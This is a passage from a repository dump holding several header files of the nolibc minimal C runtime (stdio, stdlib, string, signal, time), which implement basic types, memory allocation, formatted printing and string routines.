_NOLIBC_H 94 | #define _NOLIBC_H 95 | 96 | #include "std.h" 97 | #include "arch.h" 98 | #include "types.h" 99 | #include "sys.h" 100 | #include "ctype.h" 101 | #include "signal.h" 102 | #include "stdio.h" 103 | #include "stdlib.h" 104 | #include "string.h" 105 | #include "time.h" 106 | #include "unistd.h" 107 | 108 | /* Used by programs to avoid std includes */ 109 | #define NOLIBC 110 | 111 | #endif /* _NOLIBC_H */ 112 | -------------------------------------------------------------------------------- /exp/nolibc/signal.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * signal function definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef
_NOLIBC_SIGNAL_H 8 | #define _NOLIBC_SIGNAL_H 9 | 10 | #include "std.h" 11 | #include "arch.h" 12 | #include "types.h" 13 | #include "sys.h" 14 | 15 | /* This one is not marked static as it's needed by libgcc for divide by zero */ 16 | __attribute__((weak,unused,section(".text.nolibc_raise"))) 17 | int raise(int signal) 18 | { 19 | return sys_kill(sys_getpid(), signal); 20 | } 21 | 22 | /* make sure to include all global symbols */ 23 | #include "nolibc.h" 24 | 25 | #endif /* _NOLIBC_SIGNAL_H */ 26 | -------------------------------------------------------------------------------- /exp/nolibc/std.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * Standard definitions and types for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_STD_H 8 | #define _NOLIBC_STD_H 9 | 10 | /* Declare a few quite common macros and types that usually are in stdlib.h, 11 | * stdint.h, ctype.h, unistd.h and a few other common locations. Please place 12 | * integer type definitions and generic macros here, but avoid OS-specific and 13 | * syscall-specific stuff, as this file is expected to be included very early. 
14 | */ 15 | 16 | /* note: may already be defined */ 17 | #ifndef NULL 18 | #define NULL ((void *)0) 19 | #endif 20 | 21 | /* stdint types */ 22 | typedef unsigned char uint8_t; 23 | typedef signed char int8_t; 24 | typedef unsigned short uint16_t; 25 | typedef signed short int16_t; 26 | typedef unsigned int uint32_t; 27 | typedef signed int int32_t; 28 | typedef unsigned long long uint64_t; 29 | typedef signed long long int64_t; 30 | typedef unsigned long size_t; 31 | typedef signed long ssize_t; 32 | typedef unsigned long uintptr_t; 33 | typedef signed long intptr_t; 34 | typedef signed long ptrdiff_t; 35 | 36 | /* those are commonly provided by sys/types.h */ 37 | typedef unsigned int dev_t; 38 | typedef unsigned long ino_t; 39 | typedef unsigned int mode_t; 40 | typedef signed int pid_t; 41 | typedef unsigned int uid_t; 42 | typedef unsigned int gid_t; 43 | typedef unsigned long nlink_t; 44 | typedef signed long off_t; 45 | typedef signed long blksize_t; 46 | typedef signed long blkcnt_t; 47 | typedef signed long time_t; 48 | 49 | #endif /* _NOLIBC_STD_H */ 50 | -------------------------------------------------------------------------------- /exp/nolibc/stdio.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * minimal stdio function definitions for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_STDIO_H 8 | #define _NOLIBC_STDIO_H 9 | 10 | #include <stdarg.h> 11 | 12 | #include "std.h" 13 | #include "arch.h" 14 | #include "errno.h" 15 | #include "types.h" 16 | #include "sys.h" 17 | #include "stdlib.h" 18 | #include "string.h" 19 | 20 | #ifndef EOF 21 | #define EOF (-1) 22 | #endif 23 | 24 | /* just define FILE as a non-empty type */ 25 | typedef struct FILE { 26 | char dummy[1]; 27 | } FILE; 28 | 29 | /* We define the 3 common stdio files as constant invalid pointers that 30 | * are easily recognized.
31 | */ 32 | static __attribute__((unused)) FILE* const stdin = (FILE*)-3; 33 | static __attribute__((unused)) FILE* const stdout = (FILE*)-2; 34 | static __attribute__((unused)) FILE* const stderr = (FILE*)-1; 35 | 36 | /* getc(), fgetc(), getchar() */ 37 | 38 | #define getc(stream) fgetc(stream) 39 | 40 | static __attribute__((unused)) 41 | int fgetc(FILE* stream) 42 | { 43 | unsigned char ch; 44 | int fd; 45 | 46 | if (stream < stdin || stream > stderr) 47 | return EOF; 48 | 49 | fd = 3 + (long)stream; 50 | 51 | if (read(fd, &ch, 1) <= 0) 52 | return EOF; 53 | return ch; 54 | } 55 | 56 | static __attribute__((unused)) 57 | int getchar(void) 58 | { 59 | return fgetc(stdin); 60 | } 61 | 62 | 63 | /* putc(), fputc(), putchar() */ 64 | 65 | #define putc(c, stream) fputc(c, stream) 66 | 67 | static __attribute__((unused)) 68 | int fputc(int c, FILE* stream) 69 | { 70 | unsigned char ch = c; 71 | int fd; 72 | 73 | if (stream < stdin || stream > stderr) 74 | return EOF; 75 | 76 | fd = 3 + (long)stream; 77 | 78 | if (write(fd, &ch, 1) <= 0) 79 | return EOF; 80 | return ch; 81 | } 82 | 83 | static __attribute__((unused)) 84 | int putchar(int c) 85 | { 86 | return fputc(c, stdout); 87 | } 88 | 89 | 90 | /* fwrite(), puts(), fputs(). Note that puts() emits '\n' but not fputs(). */ 91 | 92 | /* internal fwrite()-like function which only takes a size and returns 0 on 93 | * success or EOF on error. It automatically retries on short writes. 
94 | */ 95 | static __attribute__((unused)) 96 | int _fwrite(const void *buf, size_t size, FILE *stream) 97 | { 98 | ssize_t ret; 99 | int fd; 100 | 101 | if (stream < stdin || stream > stderr) 102 | return EOF; 103 | 104 | fd = 3 + (long)stream; 105 | 106 | while (size) { 107 | ret = write(fd, buf, size); 108 | if (ret <= 0) 109 | return EOF; 110 | size -= ret; 111 | buf += ret; 112 | } 113 | return 0; 114 | } 115 | 116 | static __attribute__((unused)) 117 | size_t fwrite(const void *s, size_t size, size_t nmemb, FILE *stream) 118 | { 119 | size_t written; 120 | 121 | for (written = 0; written < nmemb; written++) { 122 | if (_fwrite(s, size, stream) != 0) 123 | break; 124 | s += size; 125 | } 126 | return written; 127 | } 128 | 129 | static __attribute__((unused)) 130 | int fputs(const char *s, FILE *stream) 131 | { 132 | return _fwrite(s, strlen(s), stream); 133 | } 134 | 135 | static __attribute__((unused)) 136 | int puts(const char *s) 137 | { 138 | if (fputs(s, stdout) == EOF) 139 | return EOF; 140 | return putchar('\n'); 141 | } 142 | 143 | 144 | /* fgets() */ 145 | static __attribute__((unused)) 146 | char *fgets(char *s, int size, FILE *stream) 147 | { 148 | int ofs; 149 | int c; 150 | 151 | for (ofs = 0; ofs + 1 < size;) { 152 | c = fgetc(stream); 153 | if (c == EOF) 154 | break; 155 | s[ofs++] = c; 156 | if (c == '\n') 157 | break; 158 | } 159 | if (ofs < size) 160 | s[ofs] = 0; 161 | return ofs ? s : NULL; 162 | } 163 | 164 | 165 | /* minimal vfprintf(). It supports the following formats: 166 | * - %[l*]{d,u,c,x,p} 167 | * - %s 168 | * - unknown modifiers are ignored. 
169 | */ 170 | static __attribute__((unused)) 171 | int vfprintf(FILE *stream, const char *fmt, va_list args) 172 | { 173 | char escape, lpref, c; 174 | unsigned long long v; 175 | unsigned int written; 176 | size_t len, ofs; 177 | char tmpbuf[21]; 178 | const char *outstr; 179 | 180 | written = ofs = escape = lpref = 0; 181 | while (1) { 182 | c = fmt[ofs++]; 183 | 184 | if (escape) { 185 | /* we're in an escape sequence, ofs == 1 */ 186 | escape = 0; 187 | if (c == 'c' || c == 'd' || c == 'u' || c == 'x' || c == 'p') { 188 | char *out = tmpbuf; 189 | 190 | if (c == 'p') 191 | v = va_arg(args, unsigned long); 192 | else if (lpref) { 193 | if (lpref > 1) 194 | v = va_arg(args, unsigned long long); 195 | else 196 | v = va_arg(args, unsigned long); 197 | } else 198 | v = va_arg(args, unsigned int); 199 | 200 | if (c == 'd') { 201 | /* sign-extend the value */ 202 | if (lpref == 0) 203 | v = (long long)(int)v; 204 | else if (lpref == 1) 205 | v = (long long)(long)v; 206 | } 207 | 208 | switch (c) { 209 | case 'c': 210 | out[0] = v; 211 | out[1] = 0; 212 | break; 213 | case 'd': 214 | i64toa_r(v, out); 215 | break; 216 | case 'u': 217 | u64toa_r(v, out); 218 | break; 219 | case 'p': 220 | *(out++) = '0'; 221 | *(out++) = 'x'; 222 | /* fall through */ 223 | default: /* 'x' and 'p' above */ 224 | u64toh_r(v, out); 225 | break; 226 | } 227 | outstr = tmpbuf; 228 | } 229 | else if (c == 's') { 230 | outstr = va_arg(args, char *); 231 | if (!outstr) 232 | outstr="(null)"; 233 | } 234 | else if (c == '%') { 235 | /* queue it verbatim */ 236 | continue; 237 | } 238 | else { 239 | /* modifiers or final 0 */ 240 | if (c == 'l') { 241 | /* long format prefix, maintain the escape */ 242 | lpref++; 243 | } 244 | escape = 1; 245 | goto do_escape; 246 | } 247 | len = strlen(outstr); 248 | goto flush_str; 249 | } 250 | 251 | /* not an escape sequence */ 252 | if (c == 0 || c == '%') { 253 | /* flush pending data on escape or end */ 254 | escape = 1; 255 | lpref = 0; 256 | outstr = 
fmt; 257 | len = ofs - 1; 258 | flush_str: 259 | if (_fwrite(outstr, len, stream) != 0) 260 | break; 261 | 262 | written += len; 263 | do_escape: 264 | if (c == 0) 265 | break; 266 | fmt += ofs; 267 | ofs = 0; 268 | continue; 269 | } 270 | 271 | /* literal char, just queue it */ 272 | } 273 | return written; 274 | } 275 | 276 | static __attribute__((unused, format(printf, 2, 3))) 277 | int fprintf(FILE *stream, const char *fmt, ...) 278 | { 279 | va_list args; 280 | int ret; 281 | 282 | va_start(args, fmt); 283 | ret = vfprintf(stream, fmt, args); 284 | va_end(args); 285 | return ret; 286 | } 287 | 288 | static __attribute__((unused, format(printf, 1, 2))) 289 | int printf(const char *fmt, ...) 290 | { 291 | va_list args; 292 | int ret; 293 | 294 | va_start(args, fmt); 295 | ret = vfprintf(stdout, fmt, args); 296 | va_end(args); 297 | return ret; 298 | } 299 | 300 | static __attribute__((unused)) 301 | void perror(const char *msg) 302 | { 303 | fprintf(stderr, "%s%serrno=%d\n", (msg && *msg) ? msg : "", (msg && *msg) ? ": " : "", errno); 304 | } 305 | 306 | /* make sure to include all global symbols */ 307 | #include "nolibc.h" 308 | 309 | #endif /* _NOLIBC_STDIO_H */ 310 | -------------------------------------------------------------------------------- /exp/nolibc/stdlib.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * stdlib function definitions for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_STDLIB_H 8 | #define _NOLIBC_STDLIB_H 9 | 10 | #include "std.h" 11 | #include "arch.h" 12 | #include "types.h" 13 | #include "sys.h" 14 | #include "string.h" 15 | 16 | struct nolibc_heap { 17 | size_t len; 18 | char user_p[] __attribute__((__aligned__)); 19 | }; 20 | 21 | /* Buffer used to store int-to-ASCII conversions. Will only be implemented if 22 | * any of the related functions is implemented. 
The area is large enough to 23 | * store "18446744073709551615" or "-9223372036854775808" and the final zero. 24 | */ 25 | static __attribute__((unused)) char itoa_buffer[21]; 26 | 27 | /* 28 | * As much as possible, please keep functions alphabetically sorted. 29 | */ 30 | 31 | /* must be exported, as it's used by libgcc for various divide functions */ 32 | __attribute__((weak,unused,noreturn,section(".text.nolibc_abort"))) 33 | void abort(void) 34 | { 35 | sys_kill(sys_getpid(), SIGABRT); 36 | for (;;); 37 | } 38 | 39 | static __attribute__((unused)) 40 | long atol(const char *s) 41 | { 42 | unsigned long ret = 0; 43 | unsigned long d; 44 | int neg = 0; 45 | 46 | if (*s == '-') { 47 | neg = 1; 48 | s++; 49 | } 50 | 51 | while (1) { 52 | d = (*s++) - '0'; 53 | if (d > 9) 54 | break; 55 | ret *= 10; 56 | ret += d; 57 | } 58 | 59 | return neg ? -ret : ret; 60 | } 61 | 62 | static __attribute__((unused)) 63 | int atoi(const char *s) 64 | { 65 | return atol(s); 66 | } 67 | 68 | static __attribute__((unused)) 69 | void free(void *ptr) 70 | { 71 | struct nolibc_heap *heap; 72 | 73 | if (!ptr) 74 | return; 75 | 76 | heap = container_of(ptr, struct nolibc_heap, user_p); 77 | munmap(heap, heap->len); 78 | } 79 | 80 | /* getenv() tries to find the environment variable named <name> in the 81 | * environment array pointed to by global variable "environ", which must be 82 | * declared as a char **, and must be terminated by a NULL (it is recommended 83 | * to set this variable to the "envp" argument of main()). If the requested 84 | * environment variable exists, its value is returned; otherwise NULL is 85 | * returned. getenv() is forcefully inlined so that the reference to "environ" 86 | * will be dropped if unused, even at -O0.
87 | */ 88 | static __attribute__((unused)) 89 | char *_getenv(const char *name, char **environ) 90 | { 91 | int idx, i; 92 | 93 | if (environ) { 94 | for (idx = 0; environ[idx]; idx++) { 95 | for (i = 0; name[i] && name[i] == environ[idx][i];) 96 | i++; 97 | if (!name[i] && environ[idx][i] == '=') 98 | return &environ[idx][i+1]; 99 | } 100 | } 101 | return NULL; 102 | } 103 | 104 | static inline __attribute__((unused,always_inline)) 105 | char *getenv(const char *name) 106 | { 107 | extern char **environ; 108 | return _getenv(name, environ); 109 | } 110 | 111 | static __attribute__((unused)) 112 | void *malloc(size_t len) 113 | { 114 | struct nolibc_heap *heap; 115 | 116 | /* Always allocate memory with size multiple of 4096. */ 117 | len = sizeof(*heap) + len; 118 | len = (len + 4095UL) & -4096UL; 119 | heap = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, 120 | -1, 0); 121 | if (__builtin_expect(heap == MAP_FAILED, 0)) 122 | return NULL; 123 | 124 | heap->len = len; 125 | return heap->user_p; 126 | } 127 | 128 | static __attribute__((unused)) 129 | void *calloc(size_t size, size_t nmemb) 130 | { 131 | size_t x = size * nmemb; 132 | 133 | if (__builtin_expect(size && ((x / size) != nmemb), 0)) { 134 | SET_ERRNO(ENOMEM); 135 | return NULL; 136 | } 137 | 138 | /* 139 | * No need to zero the heap, the MAP_ANONYMOUS in malloc() 140 | * already does it. 141 | */ 142 | return malloc(x); 143 | } 144 | 145 | static __attribute__((unused)) 146 | void *realloc(void *old_ptr, size_t new_size) 147 | { 148 | struct nolibc_heap *heap; 149 | size_t user_p_len; 150 | void *ret; 151 | 152 | if (!old_ptr) 153 | return malloc(new_size); 154 | 155 | heap = container_of(old_ptr, struct nolibc_heap, user_p); 156 | user_p_len = heap->len - sizeof(*heap); 157 | /* 158 | * Don't realloc() if @user_p_len >= @new_size, this block of 159 | * memory is still enough to handle the @new_size. Just return 160 | * the same pointer. 
161 | */ 162 | if (user_p_len >= new_size) 163 | return old_ptr; 164 | 165 | ret = malloc(new_size); 166 | if (__builtin_expect(!ret, 0)) 167 | return NULL; 168 | 169 | memcpy(ret, heap->user_p, user_p_len); 170 | munmap(heap, heap->len); 171 | return ret; 172 | } 173 | 174 | /* Converts the unsigned long integer <in> to its hex representation into 175 | * buffer <buffer>, which must be long enough to store the number and the 176 | * trailing zero (17 bytes for "ffffffffffffffff" or 9 for "ffffffff"). The 177 | * buffer is filled from the first byte, and the number of characters emitted 178 | * (not counting the trailing zero) is returned. The function is constructed 179 | * in a way to optimize the code size and avoid any divide that could add a 180 | * dependency on large external functions. 181 | */ 182 | static __attribute__((unused)) 183 | int utoh_r(unsigned long in, char *buffer) 184 | { 185 | signed char pos = (~0UL > 0xfffffffful) ? 60 : 28; 186 | int digits = 0; 187 | int dig; 188 | 189 | do { 190 | dig = in >> pos; 191 | in -= (uint64_t)dig << pos; 192 | pos -= 4; 193 | if (dig || digits || pos < 0) { 194 | if (dig > 9) 195 | dig += 'a' - '0' - 10; 196 | buffer[digits++] = '0' + dig; 197 | } 198 | } while (pos >= 0); 199 | 200 | buffer[digits] = 0; 201 | return digits; 202 | } 203 | 204 | /* converts unsigned long <in> to a hex string using the static itoa_buffer 205 | * and returns the pointer to that string. 206 | */ 207 | static inline __attribute__((unused)) 208 | char *utoh(unsigned long in) 209 | { 210 | utoh_r(in, itoa_buffer); 211 | return itoa_buffer; 212 | } 213 | 214 | /* Converts the unsigned long integer <in> to its string representation into 215 | * buffer <buffer>, which must be long enough to store the number and the 216 | * trailing zero (21 bytes for 18446744073709551615 in 64-bit, 11 for 217 | * 4294967295 in 32-bit). The buffer is filled from the first byte, and the 218 | * number of characters emitted (not counting the trailing zero) is returned.
219 | * The function is constructed in a way to optimize the code size and avoid 220 | * any divide that could add a dependency on large external functions. 221 | */ 222 | static __attribute__((unused)) 223 | int utoa_r(unsigned long in, char *buffer) 224 | { 225 | unsigned long lim; 226 | int digits = 0; 227 | int pos = (~0UL > 0xfffffffful) ? 19 : 9; 228 | int dig; 229 | 230 | do { 231 | for (dig = 0, lim = 1; dig < pos; dig++) 232 | lim *= 10; 233 | 234 | if (digits || in >= lim || !pos) { 235 | for (dig = 0; in >= lim; dig++) 236 | in -= lim; 237 | buffer[digits++] = '0' + dig; 238 | } 239 | } while (pos--); 240 | 241 | buffer[digits] = 0; 242 | return digits; 243 | } 244 | 245 | /* Converts the signed long integer <in> to its string representation into 246 | * buffer <buffer>, which must be long enough to store the number and the 247 | * trailing zero (21 bytes for -9223372036854775808 in 64-bit, 12 for 248 | * -2147483648 in 32-bit). The buffer is filled from the first byte, and the 249 | * number of characters emitted (not counting the trailing zero) is returned. 250 | */ 251 | static __attribute__((unused)) 252 | int itoa_r(long in, char *buffer) 253 | { 254 | char *ptr = buffer; 255 | int len = 0; 256 | 257 | if (in < 0) { 258 | in = -in; 259 | *(ptr++) = '-'; 260 | len++; 261 | } 262 | len += utoa_r(in, ptr); 263 | return len; 264 | } 265 | 266 | /* for historical compatibility, same as above but returns the pointer to the 267 | * buffer. 268 | */ 269 | static inline __attribute__((unused)) 270 | char *ltoa_r(long in, char *buffer) 271 | { 272 | itoa_r(in, buffer); 273 | return buffer; 274 | } 275 | 276 | /* converts long integer to a string using the static itoa_buffer and 277 | * returns the pointer to that string.
278 | */ 279 | static inline __attribute__((unused)) 280 | char *itoa(long in) 281 | { 282 | itoa_r(in, itoa_buffer); 283 | return itoa_buffer; 284 | } 285 | 286 | /* converts long integer to a string using the static itoa_buffer and 287 | * returns the pointer to that string. Same as above, for compatibility. 288 | */ 289 | static inline __attribute__((unused)) 290 | char *ltoa(long in) 291 | { 292 | itoa_r(in, itoa_buffer); 293 | return itoa_buffer; 294 | } 295 | 296 | /* converts unsigned long integer to a string using the static itoa_buffer 297 | * and returns the pointer to that string. 298 | */ 299 | static inline __attribute__((unused)) 300 | char *utoa(unsigned long in) 301 | { 302 | utoa_r(in, itoa_buffer); 303 | return itoa_buffer; 304 | } 305 | 306 | /* Converts the unsigned 64-bit integer <in> to its hex representation into 307 | * buffer <buffer>, which must be long enough to store the number and the 308 | * trailing zero (17 bytes for "ffffffffffffffff"). The buffer is filled from 309 | * the first byte, and the number of characters emitted (not counting the 310 | * trailing zero) is returned. The function is constructed in a way to optimize 311 | * the code size and avoid any divide that could add a dependency on large 312 | * external functions. 313 | */ 314 | static __attribute__((unused)) 315 | int u64toh_r(uint64_t in, char *buffer) 316 | { 317 | signed char pos = 60; 318 | int digits = 0; 319 | int dig; 320 | 321 | do { 322 | if (sizeof(long) >= 8) { 323 | dig = (in >> pos) & 0xF; 324 | } else { 325 | /* 32-bit platforms: avoid a 64-bit shift */ 326 | uint32_t d = (pos >= 32) ?
(in >> 32) : in; 327 | dig = (d >> (pos & 31)) & 0xF; 328 | } 329 | if (dig > 9) 330 | dig += 'a' - '0' - 10; 331 | pos -= 4; 332 | if (dig || digits || pos < 0) 333 | buffer[digits++] = '0' + dig; 334 | } while (pos >= 0); 335 | 336 | buffer[digits] = 0; 337 | return digits; 338 | } 339 | 340 | /* converts uint64_t to an hex string using the static itoa_buffer and 341 | * returns the pointer to that string. 342 | */ 343 | static inline __attribute__((unused)) 344 | char *u64toh(uint64_t in) 345 | { 346 | u64toh_r(in, itoa_buffer); 347 | return itoa_buffer; 348 | } 349 | 350 | /* Converts the unsigned 64-bit integer <in> to its string representation into 351 | * buffer <buffer>, which must be long enough to store the number and the 352 | * trailing zero (21 bytes for 18446744073709551615). The buffer is filled from 353 | * the first byte, and the number of characters emitted (not counting the 354 | * trailing zero) is returned. The function is constructed in a way to optimize 355 | * the code size and avoid any divide that could add a dependency on large 356 | * external functions. 357 | */ 358 | static __attribute__((unused)) 359 | int u64toa_r(uint64_t in, char *buffer) 360 | { 361 | unsigned long long lim; 362 | int digits = 0; 363 | int pos = 19; /* start with the highest possible digit */ 364 | int dig; 365 | 366 | do { 367 | for (dig = 0, lim = 1; dig < pos; dig++) 368 | lim *= 10; 369 | 370 | if (digits || in >= lim || !pos) { 371 | for (dig = 0; in >= lim; dig++) 372 | in -= lim; 373 | buffer[digits++] = '0' + dig; 374 | } 375 | } while (pos--); 376 | 377 | buffer[digits] = 0; 378 | return digits; 379 | } 380 | 381 | /* Converts the signed 64-bit integer <in> to its string representation into 382 | * buffer <buffer>, which must be long enough to store the number and the 383 | * trailing zero (21 bytes for -9223372036854775808). The buffer is filled from 384 | * the first byte, and the number of characters emitted (not counting the 385 | * trailing zero) is returned.
386 | */ 387 | static __attribute__((unused)) 388 | int i64toa_r(int64_t in, char *buffer) 389 | { 390 | char *ptr = buffer; 391 | int len = 0; 392 | 393 | if (in < 0) { 394 | in = -in; 395 | *(ptr++) = '-'; 396 | len++; 397 | } 398 | len += u64toa_r(in, ptr); 399 | return len; 400 | } 401 | 402 | /* converts int64_t to a string using the static itoa_buffer and returns 403 | * the pointer to that string. 404 | */ 405 | static inline __attribute__((unused)) 406 | char *i64toa(int64_t in) 407 | { 408 | i64toa_r(in, itoa_buffer); 409 | return itoa_buffer; 410 | } 411 | 412 | /* converts uint64_t to a string using the static itoa_buffer and returns 413 | * the pointer to that string. 414 | */ 415 | static inline __attribute__((unused)) 416 | char *u64toa(uint64_t in) 417 | { 418 | u64toa_r(in, itoa_buffer); 419 | return itoa_buffer; 420 | } 421 | 422 | /* make sure to include all global symbols */ 423 | #include "nolibc.h" 424 | 425 | #endif /* _NOLIBC_STDLIB_H */ 426 | -------------------------------------------------------------------------------- /exp/nolibc/string.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * string function definitions for NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_STRING_H 8 | #define _NOLIBC_STRING_H 9 | 10 | #include "std.h" 11 | 12 | static void *malloc(size_t len); 13 | 14 | /* 15 | * As much as possible, please keep functions alphabetically sorted. 
16 | */ 17 | 18 | static __attribute__((unused)) 19 | int memcmp(const void *s1, const void *s2, size_t n) 20 | { 21 | size_t ofs = 0; 22 | int c1 = 0; 23 | 24 | while (ofs < n && !(c1 = ((unsigned char *)s1)[ofs] - ((unsigned char *)s2)[ofs])) { 25 | ofs++; 26 | } 27 | return c1; 28 | } 29 | 30 | static __attribute__((unused)) 31 | void *_nolibc_memcpy_up(void *dst, const void *src, size_t len) 32 | { 33 | size_t pos = 0; 34 | 35 | while (pos < len) { 36 | ((char *)dst)[pos] = ((const char *)src)[pos]; 37 | pos++; 38 | } 39 | return dst; 40 | } 41 | 42 | static __attribute__((unused)) 43 | void *_nolibc_memcpy_down(void *dst, const void *src, size_t len) 44 | { 45 | while (len) { 46 | len--; 47 | ((char *)dst)[len] = ((const char *)src)[len]; 48 | } 49 | return dst; 50 | } 51 | 52 | /* might be ignored by the compiler without -ffreestanding, then found as 53 | * missing. 54 | */ 55 | __attribute__((weak,unused,section(".text.nolibc_memmove"))) 56 | void *memmove(void *dst, const void *src, size_t len) 57 | { 58 | size_t dir, pos; 59 | 60 | pos = len; 61 | dir = -1; 62 | 63 | if (dst < src) { 64 | pos = -1; 65 | dir = 1; 66 | } 67 | 68 | while (len) { 69 | pos += dir; 70 | ((char *)dst)[pos] = ((const char *)src)[pos]; 71 | len--; 72 | } 73 | return dst; 74 | } 75 | 76 | /* must be exported, as it's used by libgcc on ARM */ 77 | __attribute__((weak,unused,section(".text.nolibc_memcpy"))) 78 | void *memcpy(void *dst, const void *src, size_t len) 79 | { 80 | return _nolibc_memcpy_up(dst, src, len); 81 | } 82 | 83 | /* might be ignored by the compiler without -ffreestanding, then found as 84 | * missing. 
85 | */ 86 | __attribute__((weak,unused,section(".text.nolibc_memset"))) 87 | void *memset(void *dst, int b, size_t len) 88 | { 89 | char *p = dst; 90 | 91 | while (len--) { 92 | /* prevent gcc from recognizing memset() here */ 93 | asm volatile(""); 94 | *(p++) = b; 95 | } 96 | return dst; 97 | } 98 | 99 | static __attribute__((unused)) 100 | char *strchr(const char *s, int c) 101 | { 102 | while (*s) { 103 | if (*s == (char)c) 104 | return (char *)s; 105 | s++; 106 | } 107 | return NULL; 108 | } 109 | 110 | static __attribute__((unused)) 111 | int strcmp(const char *a, const char *b) 112 | { 113 | unsigned int c; 114 | int diff; 115 | 116 | while (!(diff = (unsigned char)*a++ - (c = (unsigned char)*b++)) && c) 117 | ; 118 | return diff; 119 | } 120 | 121 | static __attribute__((unused)) 122 | char *strcpy(char *dst, const char *src) 123 | { 124 | char *ret = dst; 125 | 126 | while ((*dst++ = *src++)); 127 | return ret; 128 | } 129 | 130 | /* this function is only used with arguments that are not constants or when 131 | * it's not known because optimizations are disabled. Note that gcc 12 132 | * recognizes an strlen() pattern and replaces it with a jump to strlen(), 133 | * thus itself, hence the asm() statement below that's meant to disable this 134 | * confusing practice. 135 | */ 136 | static __attribute__((unused)) 137 | size_t strlen(const char *str) 138 | { 139 | size_t len; 140 | 141 | for (len = 0; str[len]; len++) 142 | asm(""); 143 | return len; 144 | } 145 | 146 | /* do not trust __builtin_constant_p() at -O0, as clang will emit a test and 147 | * the two branches, then will rely on an external definition of strlen(). 148 | */ 149 | #if defined(__OPTIMIZE__) 150 | #define nolibc_strlen(x) strlen(x) 151 | #define strlen(str) ({ \ 152 | __builtin_constant_p((str)) ? 
\ 153 | __builtin_strlen((str)) : \ 154 | nolibc_strlen((str)); \ 155 | }) 156 | #endif 157 | 158 | static __attribute__((unused)) 159 | size_t strnlen(const char *str, size_t maxlen) 160 | { 161 | size_t len; 162 | 163 | for (len = 0; (len < maxlen) && str[len]; len++); 164 | return len; 165 | } 166 | 167 | static __attribute__((unused)) 168 | char *strdup(const char *str) 169 | { 170 | size_t len; 171 | char *ret; 172 | 173 | len = strlen(str); 174 | ret = malloc(len + 1); 175 | if (__builtin_expect(ret != NULL, 1)) 176 | memcpy(ret, str, len + 1); 177 | 178 | return ret; 179 | } 180 | 181 | static __attribute__((unused)) 182 | char *strndup(const char *str, size_t maxlen) 183 | { 184 | size_t len; 185 | char *ret; 186 | 187 | len = strnlen(str, maxlen); 188 | ret = malloc(len + 1); 189 | if (__builtin_expect(ret != NULL, 1)) { 190 | memcpy(ret, str, len); 191 | ret[len] = '\0'; 192 | } 193 | 194 | return ret; 195 | } 196 | 197 | static __attribute__((unused)) 198 | size_t strlcat(char *dst, const char *src, size_t size) 199 | { 200 | size_t len; 201 | char c; 202 | 203 | for (len = 0; dst[len]; len++) 204 | ; 205 | 206 | for (;;) { 207 | c = *src; 208 | if (len < size) 209 | dst[len] = c; 210 | if (!c) 211 | break; 212 | len++; 213 | src++; 214 | } 215 | 216 | return len; 217 | } 218 | 219 | static __attribute__((unused)) 220 | size_t strlcpy(char *dst, const char *src, size_t size) 221 | { 222 | size_t len; 223 | char c; 224 | 225 | for (len = 0;;) { 226 | c = src[len]; 227 | if (len < size) 228 | dst[len] = c; 229 | if (!c) 230 | break; 231 | len++; 232 | } 233 | return len; 234 | } 235 | 236 | static __attribute__((unused)) 237 | char *strncat(char *dst, const char *src, size_t size) 238 | { 239 | char *orig = dst; 240 | 241 | while (*dst) 242 | dst++; 243 | 244 | while (size && (*dst = *src)) { 245 | src++; 246 | dst++; 247 | size--; 248 | } 249 | 250 | *dst = 0; 251 | return orig; 252 | } 253 | 254 | static __attribute__((unused)) 255 | int strncmp(const 
char *a, const char *b, size_t size) 256 | { 257 | unsigned int c; 258 | int diff = 0; 259 | 260 | while (size-- && 261 | !(diff = (unsigned char)*a++ - (c = (unsigned char)*b++)) && c) 262 | ; 263 | 264 | return diff; 265 | } 266 | 267 | static __attribute__((unused)) 268 | char *strncpy(char *dst, const char *src, size_t size) 269 | { 270 | size_t len; 271 | 272 | for (len = 0; len < size; len++) 273 | if ((dst[len] = *src)) 274 | src++; 275 | return dst; 276 | } 277 | 278 | static __attribute__((unused)) 279 | char *strrchr(const char *s, int c) 280 | { 281 | const char *ret = NULL; 282 | 283 | while (*s) { 284 | if (*s == (char)c) 285 | ret = s; 286 | s++; 287 | } 288 | return (char *)ret; 289 | } 290 | 291 | /* make sure to include all global symbols */ 292 | #include "nolibc.h" 293 | 294 | #endif /* _NOLIBC_STRING_H */ 295 | -------------------------------------------------------------------------------- /exp/nolibc/time.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * time function definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_TIME_H 8 | #define _NOLIBC_TIME_H 9 | 10 | #include "std.h" 11 | #include "arch.h" 12 | #include "types.h" 13 | #include "sys.h" 14 | 15 | static __attribute__((unused)) 16 | time_t time(time_t *tptr) 17 | { 18 | struct timeval tv; 19 | 20 | /* note, cannot fail here */ 21 | sys_gettimeofday(&tv, NULL); 22 | 23 | if (tptr) 24 | *tptr = tv.tv_sec; 25 | return tv.tv_sec; 26 | } 27 | 28 | /* make sure to include all global symbols */ 29 | #include "nolibc.h" 30 | 31 | #endif /* _NOLIBC_TIME_H */ 32 | -------------------------------------------------------------------------------- /exp/nolibc/types.h: 